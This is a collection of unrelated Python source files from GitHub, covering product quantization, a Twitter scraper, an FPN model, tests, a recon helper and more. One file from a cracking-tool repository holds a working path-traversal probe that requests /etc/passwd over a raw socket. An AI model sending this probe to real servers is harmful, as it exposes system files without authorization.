range(max_iter):\r\n centroids, N_cluster = Update_centr(p, centroids, data, N_cluster)\r\n # final half update N_cluster\r\n for i_p in range(p):\r\n for j_index, j_row in enumerate(data[i_p]):\r\n # one of data to all centers distance\r\n one_L1_dis = np.sum(abs(centroids[i_p] - j_row), axis=1, dtype='float32')\r\n # find the min one for this row\r\n one_L1 = np.where(one_L1_dis == np.min(one_L1_dis, axis=0))\r\n N_cluster[i_p][j_index] = one_L1[0][0]\r\n return centroids, N_cluster\r\n data = Split_P_data(data, P)\r\n centroids = np.array(init_centroids, dtype='float32')\r\n # we can get p*N*1 array\r\n N_cluster = np.zeros([len(data[0]), P], dtype='uint8')\r\n N_cluster = np.array_split(N_cluster, P, axis=1)\r\n # assign value of N_cluster\r\n centroids, N_cluster = K_means(P, centroids, data, N_cluster, max_iter)\r\n a = N_cluster[0]\r\n for i in range(len(N_cluster)):\r\n if i == 0:\r\n continue\r\n a = np.hstack((a, N_cluster[i]))\r\n N_cluster = a\r\n # codebooks code\r\n return centroids, N_cluster\r\n\r\n\r\ndef query(queries, codebooks, codes, T):\r\n def caculate_one_p_line_dis(queries, codebooks, p):\r\n queries = np.array_split(queries, p, axis=0)\r\n a = np.zeros([256, p])\r\n for i in range(p):\r\n a[:, i] = np.sum(abs(codebooks[i] - queries[i]), axis=1)\r\n return a\r\n\r\n p = len(codes[0])\r\n QKP_dis_table = np.zeros([len(queries), 256, p])\r\n test = np.zeros([len(queries), 256, p])\r\n h = 0\r\n for i in range(len(queries)):\r\n one_line_queries = queries[i].T\r\n QKP_dis_table[i] = caculate_one_p_line_dis(one_line_queries, codebooks, p)\r\n\r\n dis_query_n = np.zeros([len(codes), 1])\r\n q_dis_query_n = np.zeros([len(queries), len(codes), 1])\r\n\r\n for q_index in range(len(queries)):\r\n for i in range(len(codes)):\r\n one_line_codes = []\r\n p_index = 0\r\n for j in codes[i]:\r\n one_line_codes.append(QKP_dis_table[q_index][j][p_index])\r\n p_index += 1\r\n dis_query_n[i] = sum(one_line_codes)\r\n q_dis_query_n[q_index] = dis_query_n\r\n sort_q_n = np.zeros([len(queries), len(codes), 1])\r\n for i in range(len(queries)):\r\n sort_q_dis_query_n = np.argsort(q_dis_query_n[i].T)\r\n sort_q_n[i] = sort_q_dis_query_n.T\r\n answer = set()\r\n answers = []\r\n for q_index in range(len(queries)):\r\n answer = set()\r\n t = 1\r\n extra = T\r\n for i in range(T):\r\n answer.add(int(sort_q_n[q_index][i][0]))\r\n last_one = sort_q_n[q_index][i][0]\r\n\r\n while t:\r\n\r\n next_one = sort_q_n[q_index][extra][0]\r\n if q_dis_query_n[q_index][int(next_one)][0] == q_dis_query_n[q_index][int(last_one)][0]:\r\n answer.add(int(next_one))\r\n extra += 1\r\n else:\r\n t = 0\r\n\r\n answers.append(answer)\r\n return answers\r\n\r\n\r\n# How to run your implementation for Part 1\r\nwith open('./toy_example/Data_File', 'rb') as f:\r\n data = pickle.load(f, encoding='bytes')\r\nwith open('./toy_example/Centroids_File', 'rb') as f:\r\n centroids = pickle.load(f, encoding='bytes')\r\nstart = time.time()\r\ncodebooks, codes = pq(data, P=2, init_centroids=centroids, max_iter=20)\r\nend = time.time()\r\ntime_cost_1 = end - start\r\nprint(f\"Part1: {time_cost_1} s\")\r\n\r\n# How to run your implementation for Part 2\r\nwith open('./toy_example/Query_File', 'rb') as f:\r\n queries = pickle.load(f, encoding='bytes')\r\nstart = time.time()\r\ncandidates = query(queries, codebooks, codes, T=10)\r\nend = time.time()\r\ntime_cost_2 = end - start\r\nprint(f\"Part2: {time_cost_2} s\")\r\nprint(candidates)\r\n","repo_name":"RJY66/COMP9318-20T1","sub_path":"9318Project1.py","file_name":"9318Project1.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17614398070","text":"import configparser\nimport gzip\nimport json\nimport os\nimport shutil\nimport time\n\nfrom TwitterAPI import TwitterAPI\n\n# Set up constants\n\nconfig = configparser.ConfigParser()\nconfig.read('./config/api_auth.cf')\nconsumer_key = config['AUTH']['consumer_key']\nconsumer_secret = config['AUTH']['consumer_secret']\naccess_token_key = config['AUTH']['access_token_key']\naccess_token_secret = config['AUTH']['access_token_secret']\n\nconfig.read('./config/conf.cf')\nwrite_file_name = config['FILE LOCS']['dirty_dataset_dir'] + '/dirty'\n# Get auth tokens, etc., initialize Twitter API connections\napi = TwitterAPI(consumer_key, consumer_secret, access_token_key, access_token_secret)\n\n# Get from the specified endpoint\nreq = api.request('statuses/sample', {})\n\n# Function to scrape, used to help restart scrapinging in case of error\ntime_start = time.time()\nnum_file = int(float(config['DATA INFO']['start_num']))\n\n\ndef scrape_stuff():\n counter = 0\n time_file = time.time()\n global num_file\n write_file = open(write_file_name + str(num_file) + '.txt', 'a+')\n time_elapsed = time.time()\n\n # Iterates over items given in request\n for item in req:\n if 'delete' in item or ('lang' in item and item['lang'] != 'en'):\n continue\n\n # Log progress\n if counter % 100 == 0:\n print('Seconds since start/last file/last 100: ' + str(time.time() - time_start) + ' // ' + str(\n time.time() - time_file) + ' // ' + str(time.time() - time_elapsed))\n print('Current progress: ' + str(counter))\n time_elapsed = time.time()\n counter += 1\n write_file.write(json.dumps(item) + '\\n')\n\n # Every 100,000 good tweets transfer them to a zip file\n if counter % 100000 == 0 and counter > 0:\n write_file.close()\n with open(write_file_name + str(num_file) + '.txt', 'rb') as f_in:\n with gzip.open(write_file_name + str(num_file) + '.txt.gz', 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n\n # Remove uncompressed\n os.remove(write_file_name + str(num_file) + '.txt')\n num_file += 1\n write_file = open(write_file_name + str(num_file) + '.txt', 'a+')\n time_file = time.time()\n\n\n# Loop to ensure continuous scraping\nwhile True:\n try:\n print('scraping')\n scrape_stuff()\n except Exception:\n req = api.request('statuses/sample', {})\n continue\n","repo_name":"ultraeric/TwitterBot","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"18611406136","text":"# -*- coding:utf-8 -*-\n\nimport socket\n\ndef verify(protocol,ip,port):\n url = protocol+'://'+ip+':'+str(port)\n timeout = 10\n print('testing if web container arbitrary file read vul')\n try:\n socket.setdefaulttimeout(timeout)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip, int(port)))\n flag = b\"GET /../../../../../../../../../etc/passwd HTTP/1.1\\r\\n\\r\\n\"\n s.send(flag)\n data = s.recv(1024)\n s.close()\n if b'root:' in data and b'nobody:' in data:\n msg = 'There is web container arbitrary file read vul on url: ' +url+ ' .'\n number = 'v30'\n print(msg)\n return True,url,number,msg\n else:\n msg = 'There is no web container arbitrary file read vul'\n number = 'v0'\n return False,url,number,msg\n except Exception as e:\n msg = str(e)\n number = 'v0'\n return False,url,number,msg\n\n","repo_name":"7hang/Python-crack","sub_path":"V-Scrack/exp/payload/webfileread.py","file_name":"webfileread.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"4"} +{"seq_id":"37638792891","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass FPN(nn.Module):\n def __init__(self, C3_inplanes, C4_inplanes, C5_inplanes, planes=256):\n super(FPN, self).__init__()\n # planes = 256 channels\n self.P3_1 = nn.Conv2d(C3_inplanes, planes, kernel_size=1, padding=0)\n self.P3_2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)\n self.P4_1 = nn.Conv2d(C4_inplanes, planes, kernel_size=1, padding=0)\n self.P4_2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)\n self.P5_1 = nn.Conv2d(C5_inplanes, planes, kernel_size=1, padding=0)\n self.P5_2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1)\n self.P6 = nn.Conv2d(C5_inplanes, planes, kernel_size=3, stride=2, padding=1)\n self.P7 = nn.Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(planes, planes, kernel_size=3, stride=2, padding=1))\n\n def forward(self, inputs):\n [C3, C4, C5] = inputs\n P5 = self.P5_1(C5)\n P4 = self.P4_1(C4)\n P4 = F.interpolate(P5, size=(P4.shape[2], P4.shape[3]),\n mode='nearest') + P4\n P3 = self.P3_1(C3)\n P3 = F.interpolate(P4, size=(P3.shape[2], P3.shape[3]),\n mode='nearest') + P3\n P6 = self.P6(C5)\n P7 = self.P7(P6)\n\n P5 = self.P5_2(P5)\n P4 = self.P4_2(P4)\n P3 = self.P3_2(P3)\n\n del C3, C4, C5\n return [P3, P4, P5, P6, P7]\n\n\nif __name__ == \"__main__\":\n # Img size 672*640 -> C1 168*160 -> C2 168*160\n # -> C3 84*80 -> C4 42*40 -> C5 21*20\n # -> P3 84*80 -> P4 42*40 -> P5 21*20 -> P6 11*10 -> P7 6*5\n C3 = torch.randn([2, 128 * 4, 84, 80])\n C4 = torch.randn([2, 256 * 4, 42, 40])\n C5 = torch.randn([2, 512 * 4, 21, 20])\n\n model = FPN(128 * 4, 256 * 4, 512 * 4)\n out = model([C3, C4, C5])\n print(\"len(out):\", len(out))\n for i in range(len(out)):\n print(i + 1, out[i].shape)\n print(out[i])\n # torch.Size([2, 256, 84, 80])\n # torch.Size([2, 256, 42, 40])\n # torch.Size([2, 256, 21, 20])\n # torch.Size([2, 256, 11, 10])\n # torch.Size([2, 256, 6, 5])\n","repo_name":"HanXiaoyiGitHub/Simple-CV-Pytorch-master","sub_path":"models/detection/RetinaNet/neck/FPN.py","file_name":"FPN.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"4"} +{"seq_id":"21322869730","text":"import unittest\nimport sys\nimport copy\nsys.path.append(\"../src\")\n\nfrom contextShim import *\nfrom util.util import *\n\nclass TestContextShim(unittest.TestCase):\n def setUp(self):\n self.c = ContextShim()\n \n # SETUP\n db = {\"GroupsEnumerated\":3,\n \"Group0\":100,\"Group1\":102,\"Group2\":103,\n \"IdsAggregated\":5,\n \"Id0\":10, \"Id1\":20, \"Id2\":30, \"Id3\":40, \"Id4\":50\n }\n self.summary = ContextSummary(1, db)\n self.s = ContextSummarySerializer()\n \n db1 = {\"GroupsEnumerated\":3,\n \"Group0\":100,\"Group1\":101,\"Group2\":102\n }\n self.summary1 = ContextSummary(2, db1)\n self.summary1.setTimestamp(time.time())\n time.sleep(0.01)\n db2 = {\"GroupsEnumerated\":3,\n \"Group0\":100,\"Group1\":102,\"Group2\":103\n }\n self.summary2 = ContextSummary(3, db2)\n self.summary2.setTimestamp(time.time())\n \n self.group = None\n \n def test_getContextBytes(self):\n \"\"\"\n Set contextHandler for the shim, and the shim will give you\n correct bytes to send\n \"\"\"\n contextHandler = self.c.getContextHandler()\n contextHandler.setMyContext(self.summary)\n contextHandler.setReceivedSummaries({2:self.summary1, 3:self.summary2})\n self.summary1.setHops(1) # only shorter hops can be included\n self.summary2.setHops(1) # only shorter hops can be included\n \n # 100 is a group, and 1 has group0(100)\n # so addGroupDefinition adds 1 into the member of 100\n g = GroupDefinition(100)\n contextHandler.addGroupDefinition(g)\n self.group = contextHandler.get(100)\n \n numberToSend = contextHandler.getSummariesToSend()\n self.assertEqual(4, len(numberToSend))\n res = self.c.getContextBytes()\n self.assertEqual(448, len(res))\n return res\n \n def test_setprocessContextBytes(self):\n # get the stream buffer\n res = self.test_getContextBytes()\n summaries = self.c.processContextBytes(res)\n expecteds = [self.summary, self.summary2, self.summary1, self.group]\n hit = 0\n for summary in summaries:\n for expected in expecteds:\n # We can't compare summary and expected one by one\n # as summary has +1 in hops because processContextBytes increases it by 1\n \n #print summary\n #print expected\n if summary.getId() == expected.getId():\n hit += 1\n\n self.assertTrue(hit == 4)\n \n def test_sameExceptHops(self):\n summary = copy.deepcopy(self.summary)\n summary.setHops(100)\n self.assertTrue(summary.sameExceptHops(self.summary))\n \nif __name__ == \"__main__\":\n unittest.main(verbosity=2)","repo_name":"prosseek/GrapevinePython","sub_path":"test/testContextShim.py","file_name":"testContextShim.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17106230085","text":"#MERGE THE HESSIAN FILTERED + THRESHOLDED IMAGES\nimport numpy as np\nimport nibabel as nib\nimport os\nfrom os import path\n\nLOWER_HESS_DIR = \"\" #PATH TO RESAMPLED + (LOWER SIGMA) HESSIAN FILTERED + THRESHOLDED DATA\nUPPER_HESS_DIR = \"\" #PATH TO RESAMPLED + (UPPER SIGMA) HESSIAN FILTERED + THRESHOLDED DATA\nMERGED_DIR = \"\" ##PATH TO RESAMPLED + COMPLETE HESSIAN FILTERED + THRESHOLDED DATA\n\nLOWER_HESS_IMG = sorted(os.listdir(LOWER_HESS_DIR))\nUPPER_HESS_IMG = sorted(os.listdir(UPPER_HESS_DIR))\n\nnew = list(zip(LOWER_HESS_IMG, UPPER_HESS_IMG))\n\nfor i, j in new:\n if \".nii.gz\" in i and j:\n lower_hess_img_dir = path.join(LOWER_HESS_DIR, i) #create directory for each file name as iterates through 'if' command\n upper_hess_img_dir = path.join(UPPER_HESS_DIR, j)\n MRA_l_hess = nib.load(lower_hess_img_dir) #load nifty file\n lower_hess = MRA_l_hess.get_fdata() #numpy array\n MRA_u_hess = nib.load(upper_hess_img_dir) # load nifty file\n upper_hess = MRA_u_hess.get_fdata() # numpy array\n full_img = lower_hess + upper_hess\n binary_img = np.where(full_img > 0.0, 1.0, 0.0)\n split_file_name = i.split('.nii')\n new_file_name = (split_file_name[0] + \"_merged\" + \".nii.gz\")\n new_out_dir = path.join(MERGED_DIR, new_file_name)\n new_img_nii = nib.Nifti1Image(binary_img, MRA_u_hess.affine) # produces new nifti file from array\n nib.save(new_img_nii, new_out_dir) # saves the nifti file in folder\n print(f'Done merging of: {i} and {j}')\n\n\n\n","repo_name":"georgiakenyon/Segmentation-method-for-cerebral-blood-vessels-from-MRA-using-hysteresis","sub_path":"MRA_Segmentation_Github/merge_hess_thresh.py","file_name":"merge_hess_thresh.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"72466677556","text":"\"\"\"\nCreated on Thu Jun 4 16:38:47 2020\n\n@author: antoinecollin\n\"\"\"\n\nfrom typing import Literal\n\nimport anndata\nimport numpy as np\nimport pandas as pd\n\ntry:\n import compute # Prevents circular import\nexcept ImportError:\n from . import compute\n\n\ndef mean_celltype(\n adata: anndata, partition_key: str = \"CellType\", add_adata: bool = True\n):\n \"\"\"\n Computes the average gene expression by celltypes\n\n Parameters\n ----------\n adata\n Annotated data matrix.\n\n partition_key\n The key in adata.obs corresponding to the annotations to be used.\n\n gene_id_key\n The key in adata.obs corresponding to the gene ID column. Default\n will use adata.var.index.\n\n add_adata\n Indicate if the average matrix should be added to the varm field\n and its index to the uns field of adata.\n\n Returns\n -------\n average_by_celltype\n The mean expression by celltype matrix with format celltypes x genes.\n \"\"\"\n celltypes = adata.obs[partition_key].cat.categories\n average_by_celltype = pd.DataFrame([], columns=list(adata.var.index))\n i = 0\n idx = []\n for cell in celltypes:\n if sum(adata.obs[partition_key] == cell) != 0:\n reduced_adata = adata[adata.obs[partition_key] == cell, :]\n mean_expr = np.asarray(reduced_adata.X.mean(axis=0))\n mean_expr = mean_expr.flatten()\n average_by_celltype.loc[i] = mean_expr\n idx.append(cell)\n i += 1\n average_by_celltype.index = idx\n if add_adata:\n adata.varm[f\"ave_celltype_counts_{partition_key}\"] = np.array(\n average_by_celltype.transpose()\n )\n adata.uns[\n f\"ave_celltype_index_{partition_key}\"\n ] = average_by_celltype.index\n return average_by_celltype\n\n\ndef get_average_celltype_counts(adata, partition_key: str = \"CellType\"):\n \"\"\"\n Gets the mean expression by celltype matrix of adata. If it's already\n in the adata object, fetches it. If it's not, computes it and adds it\n to the adata object in varm with labels in uns\n\n Parameters\n ----------\n adata\n Annotated data matrix.\n\n partition_key\n The key in adata.obs corresponding to the annotations to be used.\n\n gene_id_key\n The key in adata.obs corresponding to the gene ID column. Default\n will use adata.var.index.\n\n Returns\n -------\n average_by_celltype\n The mean expression by celltype matrix.\n \"\"\"\n try:\n adata.varm[f\"ave_celltype_counts_{partition_key}\"]\n except KeyError:\n average_by_celltype = mean_celltype(\n adata, partition_key=partition_key, add_adata=True\n )\n else:\n average_by_celltype = pd.DataFrame(\n adata.varm[f\"ave_celltype_counts_{partition_key}\"].transpose(),\n columns=adata.var.index,\n )\n average_by_celltype.index = adata.uns[\n f\"ave_celltype_index_{partition_key}\"\n ]\n return average_by_celltype\n\n\ndef get_anndata(adata_filename: str):\n \"\"\"\n Fetches the anndata file\n\n Parameters\n ----------\n adata_filename\n\n Returns\n -------\n The Anndata object\n\n \"\"\"\n adata = anndata.read_h5ad(\"\")\n return adata\n\n\ndef get_markers(markers_filename: str):\n \"\"\"\n Fetches the markers file\n\n Parameters\n markers_filename\n\n\n ----------\n markers_filename\n\n Returns\n -------\n A dict containing the markers list with their corresponding celltype\n\n \"\"\"\n # markers = dict(csv.read(...))\n # return markers\n\n\ndef get_spe(\n adata, spe_metric: Literal[\"shannon\", \"tau\", \"gini\"], partition_key\n):\n specs = {\n \"shannon\": compute.shannon_average,\n \"tau\": compute.tau_average,\n \"gini\": compute.gini_average,\n }\n try:\n adata.var[f\"{spe_metric}_{partition_key}\"]\n except KeyError:\n spe_func = specs[spe_metric]\n spe_list = spe_func(adata, partition_key)\n adata.var[f\"{spe_metric}_{partition_key}\"] = spe_list\n else:\n spe_list = adata.var[f\"{spe_metric}_{partition_key}\"]\n return spe_list\n","repo_name":"becavin-lab/checkatlas","sub_path":"checkatlas/metrics/specificity/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"4"} +{"seq_id":"3988813611","text":"from collections import defaultdict\nclass Graph:\n\n def __init__(self):\n self.graph = defaultdict(list)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n # self.graph[v].append(u)\n\n return self.graph\n\ndef dfsutil(graph,v,visited):\n\n print(v,end=\" \")\n\n for neighbor in graph[v]:\n if neighbor not in visited:\n visited.add(neighbor)\n dfsutil(graph,neighbor,visited)\n\ndef dfs(graph):\n visited = set()\n\n for i in range(1,len(graph)+1):\n if i not in visited:\n visited.add(i)\n dfsutil(graph,i,visited)\n\ng = Graph()\ng.addEdge(1, 2)\ng.addEdge(2, 4)\ng.addEdge(2, 7)\ng.addEdge(4, 6)\ng.addEdge(6, 7)\ngraph = g.addEdge(3, 5)\ndfs(graph)","repo_name":"vikramiiitm/CP","sub_path":"graph/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"34272876587","text":"import os\nfrom pickle import Pickler, Unpickler\nfrom typing import Dict, Tuple\nimport numpy as np\n\nfrom typing.io import BinaryIO\n\nfrom opinions.graph.graphs import GraphManager\nfrom opinions.interfaces.interfaces import SimulationListener\nfrom opinions.objects.opinion import OpinionManager\nfrom opinions.objects.reference import ReferenceManager\n\n\nclass OpinionsIO (SimulationListener):\n structurePickler: Pickler = None\n structureUnpickler: Unpickler = None\n topologyPickler: Pickler = None\n topologyUnpickler: Unpickler = None\n xPickler: Pickler = None\n xUnpickler: Unpickler = None\n\n outfiles: Dict[str, BinaryIO]\n\n def __init__(self):\n pass\n\n def open_input_files(self, args: Dict) -> Dict:\n try:\n in_folder_arg = args['--inFolder']\n if not os.path.exists(in_folder_arg):\n raise FileNotFoundError(f'Folder not found {in_folder_arg}')\n\n run_id = str(args['--id'])\n # run_folder = os.path.join(in_folder_arg, run_id)\n # if not os.path.exists(run_folder):\n # raise FileNotFoundError(f'Folder not found {run_folder}')\n\n topology_file_path = os.path.join(in_folder_arg, 'topology-%s.log' % (run_id,))\n # Ugly solution that works only on windows\n # topology_file_path = '\\\\\\\\?\\\\'+topology_file_path\n topology_file = open(topology_file_path, 'rb')\n structure_file_path = os.path.join(in_folder_arg, 'structure-%s.log' % (run_id,))\n structure_file = open(structure_file_path, 'rb')\n x_file_path = os.path.join(in_folder_arg, 'x-%s.log' % (run_id,))\n x_file = open(x_file_path, 'rb')\n # d_file # Do you really want it?\n except FileNotFoundError as err:\n raise RuntimeError(\n # f\"Error: {err}\\n\"\n f\"If you are using windows. This may be caused by a problem related to long path names.\\n\"\n f\"To fix it on windows 10 1607 and later, The registry key \"\n f\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem LongPathsEnabled \"\n f\"(Type: REG_DWORD) must exist and be set to 1.\\n\"\n f\"Refer to https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file?#enable-long-paths-in-windows-10-version-1607-and-later for details.\"\n )\n\n ret = dict()\n ret['topologyFile'] = topology_file\n ret['structureFile'] = structure_file\n ret['xFile'] = x_file\n # ret['dFile'] = d_file # Really need it?\n\n self.structureUnpickler = Unpickler(structure_file)\n self.topologyUnpickler = Unpickler(topology_file)\n self.xUnpickler = Unpickler(x_file)\n\n return ret\n\n def open_output_files(self, args: Dict, protocol=4) -> Dict:\n out_folder_arg = args['--outFolder']\n if not os.path.exists(out_folder_arg):\n os.makedirs(out_folder_arg, exist_ok=True)\n\n run_id = args['--id']\n topology_file_path = os.path.join(out_folder_arg, 'topology-%s.log' % (run_id,))\n topology_file = open(topology_file_path, 'wb')\n structure_file_path = os.path.join(out_folder_arg, 'structure-%s.log' % (run_id,))\n structure_file = open(structure_file_path, 'wb')\n x_file_path = os.path.join(out_folder_arg, 'x-%s.log' % (run_id,))\n x_file = open(x_file_path, 'wb')\n # d_file # Do you really want it?\n\n ret = dict()\n ret['topologyFile'] = topology_file\n ret['structureFile'] = structure_file\n ret['xFile'] = x_file\n # ret['dFile'] = d_file # Really need it?\n self.outfiles = ret\n\n self.structurePickler = Pickler(structure_file, protocol=protocol)\n self.topologyPickler = Pickler(topology_file, protocol=protocol)\n self.xPickler = Pickler(x_file, protocol=protocol)\n\n return ret\n\n def simulation_starting(self, state):\n \"\"\"Save graph_manager, reference_manager, and opinion_manager\"\"\"\n self.topologyPickler.dump(state[0])\n self.structurePickler.dump(state[1])\n self.structurePickler.dump(state[2])\n\n def retrieve_structure_and_topology(self) -> Tuple[GraphManager, ReferenceManager, OpinionManager]:\n \"\"\"retrieve graph_manager, reference_manager, and opinion_manager\"\"\"\n return self.topologyUnpickler.load(), self.structureUnpickler.load(), self.structureUnpickler.load()\n\n def simulation_started(self, state):\n self.xPickler.dump(state)\n\n def retrieve_step_delta_and_x(self) -> Tuple[int, float, np.ndarray]:\n return self.xUnpickler.load()\n\n def update(self, state):\n # later add the ability to store change in topology graph\n if len(state) == 3:\n self.xPickler.dump(state)\n elif len(state) > 3:\n self.xPickler.dump((state[0], state[1], state[2]))\n self.topologyPickler.dump(state[3])\n else:\n raise RuntimeError('Unknown state length / structure : ' + str(state))\n\n def simulation_ending(self, state):\n self.xPickler.dump(state)\n\n def simulation_ended(self, state):\n self.outfiles['xFile'].close()\n self.outfiles['topologyFile'].close()\n self.outfiles['structureFile'].close()\n","repo_name":"PyOpinions/pyOpinions","sub_path":"pyOpinions-io/src/opinions/io/opinionsIO.py","file_name":"opinionsIO.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"1245963122","text":"\"\"\"add uploaded to vogue column to analysis\n\nRevision ID: 49ded71bd1a1\nRevises: 1dadcefd3bbf\nCreate Date: 2021-03-10 13:32:40.247574\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"49ded71bd1a1\"\ndown_revision = \"1dadcefd3bbf\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\"analysis\", sa.Column(\"uploaded_to_vogue_at\", sa.DateTime(), nullable=True))\n\n\ndef downgrade():\n op.drop_column(\"analysis\", \"uploaded_to_vogue_at\")\n","repo_name":"Clinical-Genomics/cg","sub_path":"alembic/versions/49ded71bd1a1_add_uploaded_to_vogue_column_to_analysis.py","file_name":"49ded71bd1a1_add_uploaded_to_vogue_column_to_analysis.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"4"} +{"seq_id":"13810011682","text":"#!/usr/bin/env python\n# coding=utf-8\n#示例属性如下:\n #cookedLevel: 这是数字:\n #0-3表示还是生的,超过3表示半生不熟,超过5表示已经考好了,超过8表示已经烤过头了\n #cookedString:这是字符串:描述地瓜的生熟程度\n #condiments:这是地瓜的配料列表,比如番茄酱,芥末酱等\n#示例方法如下:\n#cook():把地瓜烤一段时间\n#addCondiments():给地瓜添加配料\n#__init__():设置默认的属性\n#__str__():让pint的结果看起来好一些\n\n\n#定义类,并且定义__init__()方法\n\n#定义“地瓜”类\n\nclass SweerPotato:\n '这是地瓜类'\n\n\n #定义初始化方法\n\n def __init__(self):\n self.cookedLevel = 0\n self.cookedString= \"生的\"\n self.codiments= []\n\n\n#添加“烤地瓜”方法\n '烤地瓜方法'\n def cook(self,time):\n self.cookedLevel += time\n if self.cookedLevel > 8:\n self.cookedString = \"烤成灰了\"\n elif self.cookedLevel >5:\n self.cookedString = \"烤好了\"\n elif self.cookedLevel > 3:\n self.cookedString = \"半生不熟\"\n else:\n self.cookedStrinh = \"生的\"\n\n\n\n#测试\n\nmySweetPotato = SweerPotato()\nprint(mySweetPotato.cookedLevel)\nprint(mySweetPotato.cookedString)\nprint(mySweetPotato.codiments)\n\n#测试cook方法\nprint(\"开始烤............\\n\")\nmySweetPotato.cook(4) #烤了4分钟了\nprint(mySweetPotato.cookedLevel)\nprint(mySweetPotato.cookedString)\n","repo_name":"VictorSSH/Python","sub_path":"Code/OOP/oop_3_class.py","file_name":"oop_3_class.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"33738750256","text":"#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport sys\nimport requests\nimport subprocess\nimport os\nimport uuid\nimport json\nfrom dotenv import load_dotenv\n\nhomedir = str(os.getenv('HOME'))\nload_dotenv(homedir+'/recon/config.env')\n\ntarget = sys.argv[1]\nheaders = {'Accept' : 'application/json', 'Content-Type' : 'application/json'}\nauth = (str(os.getenv('USERNAME')), str(os.getenv('PASSWORD')))\nlista_ips = []\nlista_index = ['subdomain','portscan','webenum','webvuln','infravuln']\njson_parse = ''\ndic_ip = {}\nlist_vulns = []\nlist_sistemas = []\n\ndef consulta_bases(index):\n\tdata = {\"size\":10000}\n\turl = str(os.getenv('HOST'))+target+'-'+index+'/_search'\n\tget_doc = requests.get(url, headers=headers, auth=auth, data=json.dumps(data), verify=False)\n\tparse_scan = json.loads(get_doc.text)\n\treturn(parse_scan)\n\nif len(sys.argv) != 3:\n\tfor i in lista_index:\n\t\tind = consulta_bases(i)\n\n\t\tif ind not in list_sistemas:\n\t\t\ttry:\n\t\t\t\tfor x in ind['hits']['hits']:\n\t\t\t\t\tlist_sistemas.append(x['_source']['url.original'])\n\t\t\texcept:\n\t\t\t\tpass\n\n\tos.system('clear')\n\tprint(list_sistemas)\n\texit()\nelse:\n\tsistema = sys.argv[2]\n\ndef consulta_diretorios(sistema):\n\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\tfile.write('\\n[*] Directories\\n')\n\n\tlist_sis = []\n\tfor index in lista_index:\n\t\tjson_parse = consulta_bases(index)\n\t\tfor x in json_parse['hits']['hits']:\n\t\t\ttry:\n\t\t\t\tif(x['_source']['url.original'] == sistema):\n\t\t\t\t\tif(x['_source']['url.full'] not in list_sis):\n\t\t\t\t\t\tlist_sis.append(x['_source']['url.full'])\n\t\t\t\t\t\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\t\t\t\t\t\tfile.write(x['_source']['url.full']+'\\n')\n\t\t\texcept:\n\t\t\t\tpass\n\ndef consulta_ip(ip):\n\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\tfile.write('\\n[*] Ports\\n')\n\tdic_ip[ip] = []\n\tfor index in lista_index:\n\t\tjson_parse = consulta_bases(index)\n\t\ttry:\n\t\t\tfor x in json_parse['hits']['hits']:\n\t\t\t\tif(x['_source']['server.ip'] == ip):\n\t\t\t\t\tif(x['_source']['server.port'] not in dic_ip[ip]):\n\t\t\t\t\t\tdic_ip[ip].append(x['_source']['server.port'])\n\t\t\t\t\t\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\t\t\t\t\t\t\tfile.write(str(ip)+' '+str(x['_source']['server.port'])+'\\n')\n\t\texcept:\n\t\t\tpass\n\tconsulta_diretorios(sistema)\ndef consulta_vuln():\n\tlist_vulns = []\n\tip = ''\n\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\tfile.write('[*] Vulnerabilities\\n')\n\tfor index in lista_index:\n\t\tjson_parse = consulta_bases(index)\n\t\tfor x in json_parse['hits']['hits']:\n\t\t\ttry:\n\t\t\t\tfor x in json_parse['hits']['hits']:\n\t\t\t\t\tif(x['_source']['url.original'] == sistema):\n\t\t\t\t\t\tif(x['_source']['server.ip'] != '0.0.0.0'):\n\t\t\t\t\t\t\tip = x['_source']['server.ip']\n\t\t\t\t\t\tif(x['_source']['vulnerability.name'] not in 